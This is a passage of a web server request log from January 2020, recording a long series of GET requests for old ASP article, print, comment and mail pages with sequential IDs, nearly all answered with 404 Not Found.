/newslist.asp?id=40000 HTTP/1.0" 404 6356 Not Found: /User/User_Login.asp [04/Jan/2020 13:44:25] "GET /User/User_Login.asp HTTP/1.0" 404 6368 Not Found: /newslist.asp [04/Jan/2020 13:44:26] "GET /newslist.asp?id=50000 HTTP/1.0" 404 6356 Not Found: /newslist.asp [04/Jan/2020 13:44:29] "GET /newslist.asp?id=60000 HTTP/1.0" 404 6356 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:30] "GET /aqgl/Comment.asp?ArticleID=120 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:32] "GET /aqgl/Comment.asp?ArticleID=121 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 13:44:33] "GET /newslist.asp?id=70000 HTTP/1.0" 404 6356 Not Found: /newslist.asp [04/Jan/2020 13:44:35] "GET /newslist.asp?id=80000 HTTP/1.0" 404 6356 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:36] "GET /aqgl/Comment.asp?ArticleID=133 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:39] "GET /aqgl/Comment.asp?ArticleID=135 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 13:44:40] "GET /newslist.asp?type=1&id=99001 HTTP/1.0" 404 6367 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:41] "GET /aqgl/Comment.asp?ArticleID=136 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 13:44:43] "GET /newslist.asp?type=1&id=99002 HTTP/1.0" 404 6367 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:44] "GET /aqgl/Comment.asp?ArticleID=238 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 13:44:47] "GET /newslist.asp?type=4&id=1387 HTTP/1.0" 404 6366 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:49] "GET /aqgl/Comment.asp?ArticleID=240 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 13:44:50] "GET /newslist.asp?type=4&id=1722 HTTP/1.0" 404 6366 Not Found: /xsyd/ShowClass.asp [04/Jan/2020 13:44:52] "GET /xsyd/ShowClass.asp?ClassID=%E7%8E%AF%E9%A1%BE%E4%BA%8C%E5%8D%81%E4%B8%96%E7%BA%AA%E7%9A%84%E6%96%B0%E5%84%92%E5%AE%B69&page=%E7%8E%AF%E9%A1%BE%E4%BA%8C%E5%8D%81%E4%B8%96%E7%BA%AA%E7%9A%84%E6%96%B0%E5%84%92%E5%AE%B6 HTTP/1.0" 404 6565 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:52] "GET /aqgl/Comment.asp?ArticleID=33 HTTP/1.0" 404 6372 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 13:44:53] "GET /aqgl/ShowArticle.asp?ArticleID=33 HTTP/1.0" 404 6384 Not Found: /xyzx/Print.asp [04/Jan/2020 13:44:54] "GET /xyzx/Print.asp?ArticleID=333 HTTP/1.0" 404 6367 Not Found: /xyzx/Print.asp [04/Jan/2020 13:44:56] "GET /xyzx/Print.asp?ArticleID=334 HTTP/1.0" 404 6367 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:44:56] "GET /aqgl/Comment.asp?ArticleID=34 HTTP/1.0" 404 6372 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:44:57] "GET /xyzx/SendMail.asp?ArticleID=233 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:44:59] "GET /xyzx/SendMail.asp?ArticleID=234 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:02] "GET /xyzx/SendMail.asp?ArticleID=235 HTTP/1.0" 404 6376 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:45:03] "GET /aqgl/Comment.asp?ArticleID=399 HTTP/1.0" 404 6373 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:04] "GET /xyzx/SendMail.asp?ArticleID=236 HTTP/1.0" 404 6376 Not Found: /aqgl/Comment.asp [04/Jan/2020 13:45:05] "GET /aqgl/Comment.asp?ArticleID=88 HTTP/1.0" 404 6372 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:07] "GET /xyzx/SendMail.asp?ArticleID=237 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:09] "GET /xyzx/SendMail.asp?ArticleID=239 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:12] "GET /xyzx/SendMail.asp?ArticleID=246 HTTP/1.0" 404 6376 Not Found: /aqgl/Index.asp [04/Jan/2020 13:45:12] "GET /aqgl/Index.asp HTTP/1.0" 404 6353 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:14] "GET /xyzx/SendMail.asp?ArticleID=247 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:16] "GET /aqgl/Print.asp?ArticleID=120 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:16] "GET /xyzx/SendMail.asp?ArticleID=356 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:18] "GET /xyzx/SendMail.asp?ArticleID=394 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:19] "GET /aqgl/Print.asp?ArticleID=121 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:21] "GET /xyzx/SendMail.asp?ArticleID=409 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:21] "GET /aqgl/Print.asp?ArticleID=133 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:22] "GET /xyzx/SendMail.asp?ArticleID=416 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:25] "GET /xyzx/SendMail.asp?ArticleID=418 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:25] "GET /aqgl/Print.asp?ArticleID=135 HTTP/1.0" 404 6367 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 13:45:26] "GET /aqgl/ShowArticle.asp?ArticleID=34 HTTP/1.0" 404 6384 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:28] "GET /xyzx/SendMail.asp?ArticleID=419 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:29] "GET /aqgl/Print.asp?ArticleID=136 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:31] "GET /xyzx/SendMail.asp?ArticleID=423 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:33] "GET /xyzx/SendMail.asp?ArticleID=425 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:34] "GET /aqgl/Print.asp?ArticleID=238 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:35] "GET /xyzx/SendMail.asp?ArticleID=426 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:38] "GET /aqgl/Print.asp?ArticleID=240 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:38] "GET /xyzx/SendMail.asp?ArticleID=427 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:41] "GET /xyzx/SendMail.asp?ArticleID=430 HTTP/1.0" 404 6376 Not Found: /aqgl/Print.asp [04/Jan/2020 13:45:41] "GET /aqgl/Print.asp?ArticleID=33 HTTP/1.0" 404 6366 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:43] "GET /xyzx/SendMail.asp?ArticleID=432 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:45] "GET /xyzx/SendMail.asp?ArticleID=433 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:49] "GET /xyzx/SendMail.asp?ArticleID=434 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:51] "GET /xyzx/SendMail.asp?ArticleID=435 HTTP/1.0" 404 6376 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 13:45:54] "GET /aqgl/ShowArticle.asp?ArticleID=399 HTTP/1.0" 404 6385 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:54] "GET /xyzx/SendMail.asp?ArticleID=438 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:45:57] "GET /xyzx/SendMail.asp?ArticleID=445 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:00] "GET /xyzx/SendMail.asp?ArticleID=446 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:02] "GET /xyzx/SendMail.asp?ArticleID=447 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:05] "GET /xyzx/SendMail.asp?ArticleID=449 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:08] "GET /xyzx/SendMail.asp?ArticleID=462 HTTP/1.0" 404 6376 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 13:46:08] "GET /aqgl/ShowArticle.asp?ArticleID=88 HTTP/1.0" 404 6384 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:11] "GET /xyzx/SendMail.asp?ArticleID=471 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:13] "GET /xyzx/SendMail.asp?ArticleID=472 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:15] "GET /xyzx/SendMail.asp?ArticleID=473 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:17] "GET /xyzx/SendMail.asp?ArticleID=474 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:20] "GET /xyzx/SendMail.asp?ArticleID=475 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:22] "GET /xyzx/SendMail.asp?ArticleID=476 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:25] "GET /xyzx/SendMail.asp?ArticleID=477 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:27] "GET /xyzx/SendMail.asp?ArticleID=479 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:30] "GET /xyzx/SendMail.asp?ArticleID=480 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:33] "GET /xyzx/SendMail.asp?ArticleID=481 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:37] "GET /xyzx/SendMail.asp?ArticleID=484 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:40] "GET /xyzx/SendMail.asp?ArticleID=491 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:42] "GET /xyzx/SendMail.asp?ArticleID=494 HTTP/1.0" 404 6376 Not Found: /aqgl/ShowClass.asp [04/Jan/2020 13:46:43] "GET /aqgl/ShowClass.asp?ClassID=5 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:44] "GET /xyzx/SendMail.asp?ArticleID=508 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:47] "GET /xyzx/SendMail.asp?ArticleID=509 HTTP/1.0" 404 6376 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:49] "GET /xyzx/SendMail.asp?ArticleID=91 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:51] "GET /xyzx/SendMail.asp?ArticleID=92 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:53] "GET /xyzx/SendMail.asp?ArticleID=93 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:55] "GET /xyzx/SendMail.asp?ArticleID=94 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:46:59] "GET /xyzx/SendMail.asp?ArticleID=98 HTTP/1.0" 404 6375 Not Found: /xyzx/SendMail.asp [04/Jan/2020 13:47:01] "GET /xyzx/SendMail.asp?ArticleID=99 HTTP/1.0" 404 6375 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:03] "GET /xyzx/ShowArticle.asp?ArticleID=100 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:05] "GET /xyzx/ShowArticle.asp?ArticleID=101 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:08] "GET /xyzx/ShowArticle.asp?ArticleID=102 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:12] "GET /xyzx/ShowArticle.asp?ArticleID=103 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:15] "GET /xyzx/ShowArticle.asp?ArticleID=104 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:19] "GET /xyzx/ShowArticle.asp?ArticleID=105 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:22] "GET /xyzx/ShowArticle.asp?ArticleID=106 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:25] "GET /xyzx/ShowArticle.asp?ArticleID=107 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:27] "GET /xyzx/ShowArticle.asp?ArticleID=109 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:30] "GET /xyzx/ShowArticle.asp?ArticleID=110 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:32] "GET /xyzx/ShowArticle.asp?ArticleID=111 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:34] "GET /xyzx/ShowArticle.asp?ArticleID=112 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:36] "GET /xyzx/ShowArticle.asp?ArticleID=113 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:39] "GET /xyzx/ShowArticle.asp?ArticleID=114 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:41] "GET /xyzx/ShowArticle.asp?ArticleID=115 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:43] "GET /xyzx/ShowArticle.asp?ArticleID=116 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:46] "GET /xyzx/ShowArticle.asp?ArticleID=119 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:48] "GET /xyzx/ShowArticle.asp?ArticleID=134 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:50] "GET /xyzx/ShowArticle.asp?ArticleID=174 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:53] "GET /xyzx/ShowArticle.asp?ArticleID=175 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:55] "GET /xyzx/ShowArticle.asp?ArticleID=176 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:58] "GET /xyzx/ShowArticle.asp?ArticleID=177 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:47:59] "GET /xyzx/ShowArticle.asp?ArticleID=178 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:03] "GET /xyzx/ShowArticle.asp?ArticleID=179 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:05] "GET /xyzx/ShowArticle.asp?ArticleID=180 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:07] "GET /xyzx/ShowArticle.asp?ArticleID=181 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:09] "GET /xyzx/ShowArticle.asp?ArticleID=182 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:12] "GET /xyzx/ShowArticle.asp?ArticleID=183 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:14] "GET /xyzx/ShowArticle.asp?ArticleID=184 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:16] "GET /xyzx/ShowArticle.asp?ArticleID=185 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:19] "GET /xyzx/ShowArticle.asp?ArticleID=186 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:21] "GET /xyzx/ShowArticle.asp?ArticleID=187 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:48:23] "GET /xyzx/ShowArticle.asp?ArticleID=188 HTTP/1.0" 404 6385 [04/Jan/2020 13:49:49] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowClass.asp [04/Jan/2020 13:53:58] "GET /aqgl/ShowClass.asp?ClassID=6 HTTP/1.0" 404 6375 Not Found: /aqgl/ShowClass.asp [04/Jan/2020 13:54:07] "GET /aqgl/ShowClass.asp?ClassID=7 HTTP/1.0" 404 6375 Not Found: /aqgl/ShowClass.asp [04/Jan/2020 13:54:16] "GET /aqgl/ShowClass.asp?ClassID=8 HTTP/1.0" 404 6375 Not Found: /baoxiu.asp [04/Jan/2020 13:54:27] "GET /baoxiu.asp HTTP/1.0" 404 6341 Not Found: /baoxiu_list.asp [04/Jan/2020 13:54:43] "GET /baoxiu_list.asp?baoxiu_id=225 HTTP/1.0" 404 6370 [04/Jan/2020 13:54:52] "GET / HTTP/1.0" 302 0 Not Found: /baoxiu_list.asp [04/Jan/2020 13:54:57] "GET /baoxiu_list.asp?baoxiu_id=226 HTTP/1.0" 404 6370 Not Found: /baoxiu_list.asp [04/Jan/2020 13:55:12] "GET /baoxiu_list.asp?baoxiu_id=228 HTTP/1.0" 404 6370 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:55:26] "GET /bmxx/Comment.asp?ArticleID=18 HTTP/1.0" 404 6372 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:55:44] "GET /bmxx/Comment.asp?ArticleID=248 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:56:04] "GET /bmxx/Comment.asp?ArticleID=250 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:56:26] "GET /bmxx/Comment.asp?ArticleID=324 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:56:48] "GET /bmxx/Comment.asp?ArticleID=350 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:57:04] "GET /bmxx/Comment.asp?ArticleID=352 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:57:27] "GET /bmxx/Comment.asp?ArticleID=353 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:57:44] "GET /bmxx/Comment.asp?ArticleID=354 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:58:11] "GET /bmxx/Comment.asp?ArticleID=355 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:58:22] "GET /bmxx/Comment.asp?ArticleID=367 HTTP/1.0" 404 6373 Not Found: /User/User_Favorite.asp [04/Jan/2020 13:58:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=344 HTTP/1.0" 404 6422 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:58:44] "GET /bmxx/Comment.asp?ArticleID=431 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:58:57] "GET /bmxx/Comment.asp?ArticleID=436 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:59:16] "GET /bmxx/Comment.asp?ArticleID=437 HTTP/1.0" 404 6373 Not Found: /dtgh/ShowArticle.asp [04/Jan/2020 13:59:24] "GET /dtgh/ShowArticle.asp?ArticleID=496 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 13:59:27] "GET /xyzx/ShowArticle.asp?ArticleID=494 HTTP/1.0" 404 6385 Not Found: /bmxx/Comment.asp [04/Jan/2020 13:59:54] "GET /bmxx/Comment.asp?ArticleID=454 HTTP/1.0" 404 6373 [04/Jan/2020 13:59:55] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:00:17] "GET /bmxx/Comment.asp?ArticleID=457 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:00:34] "GET /bmxx/Comment.asp?ArticleID=458 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:00:55] "GET /bmxx/Comment.asp?ArticleID=459 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:01:16] "GET /bmxx/Comment.asp?ArticleID=460 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:01:39] "GET /bmxx/Comment.asp?ArticleID=461 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:02:14] "GET /bmxx/Comment.asp?ArticleID=469 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:02:54] "GET /bmxx/Comment.asp?ArticleID=486 HTTP/1.0" 404 6373 Not Found: /bmxx/Comment.asp [04/Jan/2020 14:03:19] "GET /bmxx/Comment.asp?ArticleID=487 HTTP/1.0" 404 6373 Not Found: /bmxx/Index.asp [04/Jan/2020 14:03:38] "GET /bmxx/Index.asp HTTP/1.0" 404 6353 Not Found: /bmxx/Print.asp [04/Jan/2020 14:03:57] "GET /bmxx/Print.asp?ArticleID=18 HTTP/1.0" 404 6366 Not Found: /bmxx/Print.asp [04/Jan/2020 14:04:23] "GET /bmxx/Print.asp?ArticleID=248 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:04:40] "GET /bmxx/Print.asp?ArticleID=250 HTTP/1.0" 404 6367 [04/Jan/2020 14:05:03] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Print.asp [04/Jan/2020 14:05:05] "GET /bmxx/Print.asp?ArticleID=324 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:05:22] "GET /bmxx/Print.asp?ArticleID=350 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:05:45] "GET /bmxx/Print.asp?ArticleID=352 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:06:08] "GET /bmxx/Print.asp?ArticleID=353 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:06:33] "GET /bmxx/Print.asp?ArticleID=354 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:06:57] "GET /bmxx/Print.asp?ArticleID=355 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:07:15] "GET /bmxx/Print.asp?ArticleID=367 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:07:52] "GET /bmxx/Print.asp?ArticleID=431 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:08:22] "GET /bmxx/Print.asp?ArticleID=436 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:08:46] "GET /bmxx/Print.asp?ArticleID=437 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:09:15] "GET /bmxx/Print.asp?ArticleID=454 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:09:45] "GET /bmxx/Print.asp?ArticleID=457 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:10:15] "GET /bmxx/Print.asp?ArticleID=458 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:10:56] "GET /bmxx/Print.asp?ArticleID=459 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:11:25] "GET /bmxx/Print.asp?ArticleID=460 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:11:48] "GET /bmxx/Print.asp?ArticleID=461 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:12:06] "GET /bmxx/Print.asp?ArticleID=469 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:12:29] "GET /bmxx/Print.asp?ArticleID=486 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [04/Jan/2020 14:12:57] "GET /bmxx/Print.asp?ArticleID=487 HTTP/1.0" 404 6367 [04/Jan/2020 14:12:58] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:13:20] "GET /bmxx/SendMail.asp?ArticleID=18 HTTP/1.0" 404 6375 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:13:42] "GET /bmxx/SendMail.asp?ArticleID=248 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:14:07] "GET /bmxx/SendMail.asp?ArticleID=250 HTTP/1.0" 404 6376 Not Found: /ShowCopyFrom.asp [04/Jan/2020 14:14:27] "GET /ShowCopyFrom.asp?ChannelID=1002&SourceName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%BF%EF%BF%BD HTTP/1.0" 404 6594 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:14:34] "GET /bmxx/SendMail.asp?ArticleID=324 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:14:53] "GET /bmxx/SendMail.asp?ArticleID=350 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:15:18] "GET /bmxx/SendMail.asp?ArticleID=352 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:15:39] "GET /bmxx/SendMail.asp?ArticleID=353 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:15:58] "GET /bmxx/SendMail.asp?ArticleID=354 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:16:25] "GET /bmxx/SendMail.asp?ArticleID=355 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:16:49] "GET /bmxx/SendMail.asp?ArticleID=367 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:17:08] "GET /bmxx/SendMail.asp?ArticleID=431 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:17:37] "GET /bmxx/SendMail.asp?ArticleID=436 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:17:56] "GET /bmxx/SendMail.asp?ArticleID=437 HTTP/1.0" 404 6376 [04/Jan/2020 14:18:01] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:18:16] "GET /bmxx/SendMail.asp?ArticleID=454 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:18:38] "GET /bmxx/SendMail.asp?ArticleID=457 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:18:58] "GET /bmxx/SendMail.asp?ArticleID=458 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:19:14] "GET /bmxx/SendMail.asp?ArticleID=459 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:19:31] "GET /bmxx/SendMail.asp?ArticleID=460 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:19:46] "GET /bmxx/SendMail.asp?ArticleID=461 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:20:02] "GET /bmxx/SendMail.asp?ArticleID=469 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 14:20:29] "GET /bmxx/SendMail.asp?ArticleID=486 HTTP/1.0" 404 